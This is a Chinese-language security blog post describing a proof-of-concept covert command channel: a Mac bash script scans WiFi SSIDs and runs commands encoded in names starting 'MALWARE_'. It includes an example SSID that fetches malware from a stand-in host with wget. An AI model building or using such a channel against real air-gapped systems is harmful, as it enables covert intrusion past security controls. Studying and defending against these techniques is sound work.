跨越物理隔离:低层级命令与控制 | 网络安全与罪孽
网络安全与罪孽 - Rishi Narang的博客
工具配置(演示用途):
- Macbook
- Bash脚本(模拟恶意行为)
- 支持热点功能的安卓手机
介绍
威胁环境变化迅速,新的威胁向量正为乐趣和利益利用漏洞。白帽安全社区正与对手争分夺秒。企业常常成为鱼叉式网络钓鱼、高级持续性威胁和僵尸网络的目标。金融、保险、国防等行业虽有严格的边界防护规定,但员工常使用带WiFi和蓝牙适配器的现代笔记本电脑。本文重点演示如何在不连接任何网络的情况下传输数据,从而难以检测、记录和识别!
如果你好奇什么是物理隔离系统?根据《连线》杂志的定义:
物理隔离指未直接连接互联网或任何已连接互联网的计算机的计算机或网络。
免责声明:这仅是一个概念。请勿以任何未经授权的方式使用!
命令
每台带WiFi的笔记本电脑和操作系统都有扫描无线网络并连接的功能。在Macbook上,可通过终端使用二进制文件查看:
|
|
执行该二进制文件显示以下选项:
现在,要扫描网络,可使用-s开关:
|
|
这类似于图形界面的WiFi扫描:
如果这些广播SSID可见,那么恶意脚本同样能看到。以下是脚本示例:
脚本执行
脚本在无限循环中执行,扫描寻找MALWARE_广播SSID。一旦检测到该SSID,便执行命令并(根据需要)退出。演示中,安卓手机设置了名为MALWARE_ls的个人热点。
最后,一些思考点:
- 该技术理论上不可检测
- 无需任何连接即可传输数据,因为脚本只扫描SSID而不连接或造成网络中断
- 边界安全无警报,它们根本不参与
- 通过适配器扫描实现物理隔离跨越
该技术本身可通过发布命令(如通过SSID MALWARE_wget-hxxp://malicious.com/malware.exe使用wget)下载更强大的恶意软件,然后解析“-”符号为空格以执行更复杂的命令等。
免责声明:这仅是一个概念。请勿以任何未经授权的方式使用!
保持安全,心怀善意。干杯。
封面图片:1AmFcShack拍摄